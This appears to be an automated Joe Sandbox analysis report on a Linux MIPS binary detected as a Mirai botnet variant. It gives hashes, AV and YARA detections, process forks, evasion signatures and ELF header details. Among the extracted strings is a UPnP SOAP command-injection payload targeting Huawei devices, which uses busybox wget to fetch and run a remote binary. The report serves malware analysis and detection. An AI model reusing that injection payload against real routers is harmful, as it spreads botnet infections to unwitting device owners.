Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
na.elf

Overview

General Information

Sample name:na.elf
Analysis ID:1527085
MD5:aca79f9a14f86e525687797af2082e49
SHA1:5329a91f0766e446960fb89196db06c9d6c6a55a
SHA256:143de0029bbd8f7d556fd31db2664a386f26ea27b02446bd53fcad34586944b1
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:76
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sleeps for long times indicative of sandbox evasion
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1527085
Start date and time:2024-10-06 20:56:37 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 54s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:na.elf
Detection:MAL
Classification:mal76.troj.linELF@0/0@0/0
  • Skipping network analysis since amount of network traffic is too extensive
  • VT rate limit hit for: na.elf
Command:/tmp/na.elf
PID:6218
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
All the china banks
Standard Error:
  • system is lnxubuntu20
  • na.elf (PID: 6218, Parent: 6134, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: /tmp/na.elf
    • na.elf New Fork (PID: 6220, Parent: 6218)
      • na.elf New Fork (PID: 6231, Parent: 6220)
      • na.elf New Fork (PID: 6233, Parent: 6220)
        • na.elf New Fork (PID: 6235, Parent: 6233)
    • na.elf New Fork (PID: 6222, Parent: 6218)
    • na.elf New Fork (PID: 6223, Parent: 6218)
      • na.elf New Fork (PID: 6227, Parent: 6223)
      • na.elf New Fork (PID: 6273, Parent: 6223)
        • na.elf New Fork (PID: 6275, Parent: 6273)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
na.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
    na.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      SourceRuleDescriptionAuthorStrings
      6220.1.00007f19c4400000.00007f19c4417000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
        6220.1.00007f19c4400000.00007f19c4417000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6222.1.00007f19c4400000.00007f19c4417000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
            6222.1.00007f19c4400000.00007f19c4417000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              6218.1.00007f19c4400000.00007f19c4417000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
                Click to see the 13 entries
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: na.elfAvira: detected
                Source: na.elfReversingLabs: Detection: 52%
                Source: /tmp/na.elf (PID: 6218)Socket: 127.0.0.1:1172Jump to behavior
                Source: na.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: na.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g
                Source: Initial sampleString containing 'busybox' found: -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: ELF static info symbol of initial sample.symtab present: no
                Source: /tmp/na.elf (PID: 6275)SIGKILL sent: pid: 6273, result: successfulJump to behavior
                Source: classification engineClassification label: mal76.troj.linELF@0/0@0/0

                Persistence and Installation Behavior

                barindex
                Source: /tmp/na.elf (PID: 6220)File: /proc/6220/mountsJump to behavior
                Source: /tmp/na.elf (PID: 6275)Sleeps longer then 60s: 60.0sJump to behavior
                Source: /tmp/na.elf (PID: 6218)Queries kernel information via 'uname': Jump to behavior
                Source: na.elf, 6218.1.000055bff4792000.000055bff483a000.rw-.sdmp, na.elf, 6220.1.000055bff4792000.000055bff483a000.rw-.sdmp, na.elf, 6231.1.000055bff4792000.000055bff483a000.rw-.sdmp, na.elf, 6222.1.000055bff4792000.000055bff483a000.rw-.sdmp, na.elf, 6273.1.000055bff4792000.000055bff483a000.rw-.sdmp, na.elf, 6275.1.000055bff4792000.000055bff483a000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mipsel
                Source: na.elf, 6218.1.000055bff4792000.000055bff483a000.rw-.sdmp, na.elf, 6220.1.000055bff4792000.000055bff483a000.rw-.sdmp, na.elf, 6231.1.000055bff4792000.000055bff483a000.rw-.sdmp, na.elf, 6222.1.000055bff4792000.000055bff483a000.rw-.sdmp, na.elf, 6273.1.000055bff4792000.000055bff483a000.rw-.sdmp, na.elf, 6275.1.000055bff4792000.000055bff483a000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/mipsel
                Source: na.elf, 6218.1.00007ffe994f9000.00007ffe9951a000.rw-.sdmp, na.elf, 6220.1.00007ffe994f9000.00007ffe9951a000.rw-.sdmp, na.elf, 6231.1.00007ffe994f9000.00007ffe9951a000.rw-.sdmp, na.elf, 6222.1.00007ffe994f9000.00007ffe9951a000.rw-.sdmp, na.elf, 6273.1.00007ffe994f9000.00007ffe9951a000.rw-.sdmp, na.elf, 6275.1.00007ffe994f9000.00007ffe9951a000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mipsel
                Source: na.elf, 6218.1.00007ffe994f9000.00007ffe9951a000.rw-.sdmp, na.elf, 6220.1.00007ffe994f9000.00007ffe9951a000.rw-.sdmp, na.elf, 6231.1.00007ffe994f9000.00007ffe9951a000.rw-.sdmp, na.elf, 6222.1.00007ffe994f9000.00007ffe9951a000.rw-.sdmp, na.elf, 6273.1.00007ffe994f9000.00007ffe9951a000.rw-.sdmp, na.elf, 6275.1.00007ffe994f9000.00007ffe9951a000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-mipsel/tmp/na.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/na.elf

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: na.elf, type: SAMPLE
                Source: Yara matchFile source: 6220.1.00007f19c4400000.00007f19c4417000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6222.1.00007f19c4400000.00007f19c4417000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6218.1.00007f19c4400000.00007f19c4417000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6273.1.00007f19c4400000.00007f19c4417000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6275.1.00007f19c4400000.00007f19c4417000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6231.1.00007f19c4400000.00007f19c4417000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: na.elf PID: 6218, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: na.elf PID: 6220, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: na.elf PID: 6222, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: na.elf PID: 6231, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: na.elf PID: 6273, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: na.elf PID: 6275, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: na.elf, type: SAMPLE
                Source: Yara matchFile source: 6220.1.00007f19c4400000.00007f19c4417000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6222.1.00007f19c4400000.00007f19c4417000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6218.1.00007f19c4400000.00007f19c4417000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6273.1.00007f19c4400000.00007f19c4417000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6275.1.00007f19c4400000.00007f19c4417000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6231.1.00007f19c4400000.00007f19c4417000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: na.elf PID: 6218, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: na.elf PID: 6220, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: na.elf PID: 6222, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: na.elf PID: 6231, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: na.elf PID: 6273, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: na.elf PID: 6275, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath Interception1
                Virtualization/Sandbox Evasion
                OS Credential Dumping11
                Security Software Discovery
                Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory1
                Virtualization/Sandbox Evasion
                Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager1
                File and Directory Discovery
                SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
                No configs have been found
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Number of created Files
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1527085 Sample: na.elf Startdate: 06/10/2024 Architecture: LINUX Score: 76 29 Antivirus / Scanner detection for submitted sample 2->29 31 Multi AV Scanner detection for submitted file 2->31 33 Yara detected Mirai 2->33 8 na.elf 2->8         started        process3 process4 10 na.elf 8->10         started        13 na.elf 8->13         started        15 na.elf 8->15         started        signatures5 35 Sample reads /proc/mounts (often used for finding a writable filesystem) 10->35 17 na.elf 10->17         started        19 na.elf 10->19         started        21 na.elf 13->21         started        23 na.elf 13->23         started        process6 process7 25 na.elf 17->25         started        27 na.elf 21->27         started       
                SourceDetectionScannerLabelLink
                na.elf53%ReversingLabsLinux.Trojan.Mirai
                na.elf100%AviraEXP/ELF.Mirai.Hua.c
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                No contacted domains info
                NameSourceMaliciousAntivirus DetectionReputation
                http://schemas.xmlsoap.org/soap/encoding/na.elffalse
                • URL Reputation: safe
                unknown
                http://schemas.xmlsoap.org/soap/envelope/na.elffalse
                • URL Reputation: safe
                unknown
                No contacted IP infos
                No context
                No context
                No context
                No context
                No context
                No created / dropped files found
                File type:ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                Entropy (8bit):5.534563740741626
                TrID:
                • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                File name:na.elf
                File size:97'260 bytes
                MD5:aca79f9a14f86e525687797af2082e49
                SHA1:5329a91f0766e446960fb89196db06c9d6c6a55a
                SHA256:143de0029bbd8f7d556fd31db2664a386f26ea27b02446bd53fcad34586944b1
                SHA512:a5f70ffc33c57e483ad98aeb5d5718aab9dbcc406edda83e64c6dc0a20c7fd454a3aab6b4084c8896e9f095642d02a3e87f57c095a13cad43083543dd04a0ecd
                SSDEEP:1536:CRA6Yi43BQytT6YSdogNExoG5LgnrpQQZkgK0yWEp1mZXeVgkSh93:CR/YJBb+EhLgnNQQpECOgkSD
                TLSH:6C93D75ABF610EFBD86FCD3706A9070635CC551B22B93B363574D828F64A14B4AE3CA4
                File Content Preview:.ELF....................`.@.4....y......4. ...(...............@...@.po..po...............p...pE..pE.X...XZ..........Q.td...............................<L..'!......'.......................<(..'!... .........9'.. ........................<...'!...........`O9

                ELF header

                Class:ELF32
                Data:2's complement, little endian
                Version:1 (current)
                Machine:MIPS R3000
                Version Number:0x1
                Type:EXEC (Executable file)
                OS/ABI:UNIX - System V
                ABI Version:0
                Entry Point Address:0x400260
                Flags:0x1007
                ELF Header Size:52
                Program Header Offset:52
                Program Header Size:32
                Number of Program Headers:3
                Section Header Offset:96700
                Section Header Size:40
                Number of Section Headers:14
                Header String Table Index:13
                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                NULL0x00x00x00x00x0000
                .initPROGBITS0x4000940x940x8c0x00x6AX004
                .textPROGBITS0x4001200x1200x14eb00x00x6AX0016
                .finiPROGBITS0x414fd00x14fd00x5c0x00x6AX004
                .rodataPROGBITS0x4150300x150300x1f400x00x2A0016
                .ctorsPROGBITS0x4570000x170000x80x00x3WA004
                .dtorsPROGBITS0x4570080x170080x80x00x3WA004
                .data.rel.roPROGBITS0x4570140x170140xc0x00x3WA004
                .dataPROGBITS0x4570200x170200x3c80x00x3WA0016
                .gotPROGBITS0x4573f00x173f00x5680x40x10000003WAp0016
                .sbssNOBITS0x4579580x179580x200x00x10000003WAp004
                .bssNOBITS0x4579800x179580x50d80x00x3WA0016
                .mdebug.abi32PROGBITS0xbf40x179580x00x00x0001
                .shstrtabSTRTAB0x00x179580x640x00x0001
                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                LOAD0x00x4000000x4000000x16f700x16f705.56290x5R E0x10000.init .text .fini .rodata
                LOAD0x170000x4570000x4570000x9580x5a584.02740x6RW 0x10000.ctors .dtors .data.rel.ro .data .got .sbss .bss
                GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                System Behavior

                Start time (UTC):18:57:17
                Start date (UTC):06/10/2024
                Path:/tmp/na.elf
                Arguments:/tmp/na.elf
                File size:5773336 bytes
                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                Start time (UTC):18:57:17
                Start date (UTC):06/10/2024
                Path:/tmp/na.elf
                Arguments:-
                File size:5773336 bytes
                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                Start time (UTC):18:57:17
                Start date (UTC):06/10/2024
                Path:/tmp/na.elf
                Arguments:-
                File size:5773336 bytes
                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                Start time (UTC):18:57:17
                Start date (UTC):06/10/2024
                Path:/tmp/na.elf
                Arguments:-
                File size:5773336 bytes
                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                Start time (UTC):18:57:17
                Start date (UTC):06/10/2024
                Path:/tmp/na.elf
                Arguments:-
                File size:5773336 bytes
                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                Start time (UTC):18:57:17
                Start date (UTC):06/10/2024
                Path:/tmp/na.elf
                Arguments:-
                File size:5773336 bytes
                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                Start time (UTC):18:57:17
                Start date (UTC):06/10/2024
                Path:/tmp/na.elf
                Arguments:-
                File size:5773336 bytes
                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                Start time (UTC):18:57:17
                Start date (UTC):06/10/2024
                Path:/tmp/na.elf
                Arguments:-
                File size:5773336 bytes
                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                Start time (UTC):18:57:40
                Start date (UTC):06/10/2024
                Path:/tmp/na.elf
                Arguments:-
                File size:5773336 bytes
                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                Start time (UTC):18:57:40
                Start date (UTC):06/10/2024
                Path:/tmp/na.elf
                Arguments:-
                File size:5773336 bytes
                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9